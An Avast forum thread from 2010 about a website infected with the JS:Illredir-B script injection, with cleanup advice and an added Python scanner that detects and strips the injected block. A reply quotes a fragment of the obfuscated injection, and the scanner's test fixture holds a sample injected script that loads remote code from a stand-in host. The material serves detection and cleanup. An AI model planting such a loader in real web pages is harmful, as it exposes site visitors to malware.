Author Topic: Does any know anything about JS:Illredir-B[Trj]  (Read 19741 times)


chromenun

  • Guest
Does any know anything about JS:Illredir-B[Trj]
« on: January 07, 2010, 06:43:47 PM »
When I attempt to go to my website, Avast gives me a warning that it is infected with a Trojan Horse, and it says it is JS:Illredir-B[Trj]

I do not know if this is a real Trojan or a false positive.  Does anyone know anything about this problem?  And how do I fix it???

Thanks,
Lezlie

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #1 on: January 07, 2010, 07:11:44 PM »
Hi chromenum,

Can you give the address like hxtp or with wXw so that we can see what is there.
More about this attack onto websites here:
http://www.wjunction.com/showthread.php?t=21715
and the subject also treated here:
http://forum.avast.com/index.php?topic=52476.0

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #2 on: January 07, 2010, 07:28:28 PM »
I am sorry, I should have posted the URL for the site...
It is wXw.obebooks.com

And thanks, I will take a look at the links you provided...

« Last Edit: January 07, 2010, 07:59:38 PM by chromenun »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88899
  • No support PMs thanks
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #3 on: January 07, 2010, 07:46:52 PM »
Is that the link to the alert, as I have checked that out and got no alert?

Check the avast! Log Viewer (right click the avast 'a' icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe
 
- Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log and copy and paste the entry.
####
When posting URLs to suspect sites, change the http to hXXp so the link isn't active (clickable) avoiding accidental exposure.

However there is a rather strange-looking script tag on the home page after the closing HTML tag, a bit of a standards no-no. So you could check that out and see if it should be there. It looks like it is trying to create an obfuscated script tag, and that may be what the redirect is about, see image.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #4 on: January 07, 2010, 07:57:04 PM »
This page seems to be <suspicious>
http://www.UnmaskParasites.com/security-report/?page=www.obebooks.com

and norton is blocking it also (HTTP Fragus Toolkit Download Activity)
« Last Edit: January 07, 2010, 07:58:44 PM by Pondus »

chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #5 on: January 07, 2010, 07:59:07 PM »
I am sorry, I didn't realize about the "live" link thingy...Now I understand...

I think my friend must be working on killing the virus/trojan because I just went there myself and I got no warning this time...

As soon as I hear from him, I will let ya'll know if he is taking care of it...

Thanks for trying to help!!!!

chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #6 on: January 07, 2010, 08:06:56 PM »
And, Pondus, thank you so much for the link about the online security place, unmaskparasites.com.  I was not aware of that site.

Thanks for all the help ya'll are giving me...


chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #7 on: January 07, 2010, 08:12:51 PM »
Ok, here is the log from Avast:

1/6/2010 6:16:42 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:17:21 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:26:52 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:26:52 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:27:09 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:50:07 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:50:07 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:50:30 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 10:10:46 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 10:10:53 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/7/2010 11:06:31 AM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/" file. 
1/7/2010 11:07:03 AM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/" file. 

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #8 on: January 07, 2010, 08:23:36 PM »
Hi chromenun,

Suspicious inline script
Code:
/*LGPL*/ try{ window.onload = function(){var Ilsyqujcs9bk8 = document.createElement('s^#^$c&#^!(r#^
And here about the vulnerability of using that particular script with inline handlers:
http://cross-browser.com/talk/event_interface_soup.php

On the Fragus toolkit: http://www.finjan.com/Content.aspx?xmlid=500449&id=607  &
http://www.efblog.net/2009/08/fragus-new-botnet-framework-in-wild.html

polonus

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88899
  • No support PMs thanks
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #9 on: January 07, 2010, 09:17:40 PM »
Ok, here is the log from Avast:

1/6/2010 6:16:42 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:17:21 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:26:52 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:26:52 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:27:09 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
<SNIP>
1/7/2010 11:07:03 AM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/" file. 


OK, looks like there is a lot of work to do in cleaning these files as I suspect that they too may have been hacked.

You will also have to edit your list to break the links to suspect locations, like I have done in the quote above.

This looks like content management software possibly being exploited:
- This is commonly down to old content management software being vulnerable, PHP, Joomla, Wordpress, SQL, etc. etc. See this example of a host's response to a hacked site.
Quote
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains.  We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

1. Check all index pages for any signs of JavaScript injected into their coding. On Windows servers check any "default.aspx" or "default.cfm" pages as those are popular targets too.

2. Remove any "rogue" files or PHP scripts uploaded by the hackers into your account. Such scripts allowed them to make account-wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

3. Check all .htaccess files, as hackers like to load redirects into them.

4. Change all passwords for that end user account: the cp password, the ftp password, and any ftp sub accounts. Make sure to use a "strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers' efforts. In some cases you may still have coding which allows for injection. All user input fields, hidden or not, should be hard coded, filtered, and sanitized before being handed off to PHP or a database, which will prevent coding characters from being submitted and run through your software.


Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.


chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #10 on: January 09, 2010, 04:21:49 AM »
Ok, I just spent a good while going through a lot of my files on my website.  In most of the php files there is a weird code that looks a lot like this:

<script>/GNU GPL/try{window.onload=function} (and then a bunch of random type characters that go on for about 8 lines, and then ends with append.child, catch and then the end of script)

I was afraid to post the actual code here...anyway, is that the virus???  Do I just delete that code from each file that contains it??

Thanks,
Lezlie

spg SCOTT

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #11 on: January 09, 2010, 03:34:04 PM »
Wise choice not to post the script...could cause more problems than good...

I have checked, and that seems to be the code that is causing the alert from avast!

What you will need to do is as you said, delete it from all of the files that contain it, and also follow the instructions set out by DavidR to prevent re-infection.

-Scott-

trzykas

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #12 on: January 13, 2010, 10:39:26 AM »
hi

I got this virus on my server.

I wrote a simple script to remove this script from all files.

Here someone used it to remove this script from a server, so you can check how it works:

http://www.romania-virtuala.ro/remove-js-illredir-b.php

And here you have an opinion about this script:

http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/


And here is the link for the script:

http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz

Enjoy
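An added example, not code from this thread, from trzykas's script, or from any of the posters: a scanner that does what DavidR's checklist (steps 1 to 3) and Lezlie's description of the injected block call for. It walks a web root, flags any <script> block that opens with a GPL/LGPL comment and try{window.onload=function... and closes with appendChild ... catch ... </script>, flags any <script> that appears after the closing </html> tag, lists Redirect/RewriteRule lines in .htaccess files, and (only when asked) strips the injected blocks after writing a .bak copy. The regex is reconstructed from how the posts describe the injection, the sample files are constructed for the demo (the payload URL points at a reserved .invalid domain), and the demo() helper builds a throwaway web root; none of that is from the original page. Run it once without remove=True and read the report before cleaning anything.

```python
"""Added example: find and strip the injected <script> block described in this thread.

Not code from the thread or its posters. The pattern is reconstructed from the posts'
description of the injection; sample file contents below are constructed, not real payload.
"""
import re
import tempfile
from pathlib import Path

# The injected block as the thread describes it: a GPL/LGPL comment, try{window.onload=function,
# a dynamically created element appended with appendChild, a trailing catch, then </script>.
# Non-greedy [\s\S]*? keeps a match inside one block; IGNORECASE because copies vary in case.
INJECT_RE = re.compile(
    r"<script[^>]*>\s*/\*?\s*(?:LGPL|GNU\s+GPL|GPL)\s*\*?/\s*"
    r"try\s*\{\s*window\.onload\s*=\s*function[\s\S]*?appendChild\s*\([^)]*\)"
    r"[\s\S]*?catch\s*\([^)]*\)\s*\{[^}]*\}\s*</script>",
    re.IGNORECASE,
)
# DavidR's other tell: a <script> tag sitting after the closing </html> tag.
AFTER_HTML_RE = re.compile(r"</html>[\s\S]*<script", re.IGNORECASE)
# Step 3 of the host's checklist: redirect rules planted in .htaccess files.
HTACCESS_RE = re.compile(
    r"^\s*(?:Redirect(?:Match|Permanent|Temp)?|RewriteRule)\b.*$",
    re.IGNORECASE | re.MULTILINE,
)
# File types from step 1 of the checklist plus the .js files in the avast log.
WEB_EXTS = {".php", ".html", ".htm", ".js", ".aspx", ".cfm"}


def find_injections(text):
    """Return every injected block found in one file's contents."""
    return [m.group(0) for m in INJECT_RE.finditer(text)]


def has_script_after_html(text):
    """True if a <script> tag appears after the closing </html> tag."""
    return AFTER_HTML_RE.search(text) is not None


def htaccess_redirects(text):
    """Return the Redirect/RewriteRule lines of an .htaccess file for manual review."""
    return HTACCESS_RE.findall(text)


def clean_text(text):
    """Strip the injected blocks; returns (cleaned_text, number_removed)."""
    return INJECT_RE.subn("", text)


def scan_tree(root, remove=False):
    """Walk a web root and report findings per file. With remove=True, rewrite infected
    files in place, but only after a .bak copy of the original has been written."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        rel = str(path.relative_to(root))
        if path.name == ".htaccess":            # Path(".htaccess").suffix is "", so check by name
            rules = htaccess_redirects(text)
            if rules:
                report[rel] = {"redirect_rules": rules}
            continue
        if path.suffix.lower() not in WEB_EXTS:
            continue
        hits = find_injections(text)
        trailing = has_script_after_html(text)
        if hits or trailing:
            report[rel] = {"injections": len(hits), "script_after_html": trailing}
            if remove and hits:
                path.with_name(path.name + ".bak").write_bytes(path.read_bytes())
                path.write_text(clean_text(text)[0], encoding="utf-8")
    return report


# Constructed sample files: an infected index page (payload modelled on the thread's
# description, pointing at a reserved .invalid domain), a clean page, and a planted redirect.
SAMPLE_INFECTED = (
    "<html><body><p>Book list</p></body></html>\n"
    "<script>/*GNU GPL*/ try{ window.onload = function(){"
    "var Abc = document.createElement('script');"
    "Abc.src = 'http://example.invalid/in.cgi';"
    "document.body.appendChild(Abc);} } catch(e) {}</script>\n"
)
SAMPLE_CLEAN = "<html><body><p>Book list</p></body></html>\n"
SAMPLE_HTACCESS = "RewriteEngine On\nRewriteRule ^(.*)$ http://example.invalid/ [R,L]\n"


def demo():
    """Build a throwaway web root, scan and clean it, then scan again.
    Returns (report_before, report_after, backup_intact)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(SAMPLE_INFECTED, encoding="utf-8")
        (root / "about.html").write_text(SAMPLE_CLEAN, encoding="utf-8")
        (root / ".htaccess").write_text(SAMPLE_HTACCESS, encoding="utf-8")
        before = scan_tree(root, remove=True)
        after = scan_tree(root)
        backup_intact = (root / "index.php.bak").read_text(encoding="utf-8") == SAMPLE_INFECTED
    return before, after, backup_intact


if __name__ == "__main__":
    before, after, ok = demo()
    print("before:", before)
    print("after: ", after)
    print("backup intact:", ok)
```

Cleaning the files only closes the visible symptom; step 4 of the checklist (changing the cPanel and FTP passwords) and the removal of any uploaded PHP shells still have to be done by hand, or the block comes back. Since the injection was found inside FCKeditor's own .js files as well as the index page, run the scan over the whole account, not just the document root.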



CharleyO

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #13 on: January 14, 2010, 10:43:02 AM »
***

Welcome to the forums,  trzykas.   :)

Thanks for posting information.


***

trzykas

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #14 on: January 14, 2010, 01:21:24 PM »
I have actually upgraded the script to remove JS:Illredir-B and JS:Illredir-C at the same time.
If you have some other similar trojan on your website, please contact me; I will try to help and upgrade the script.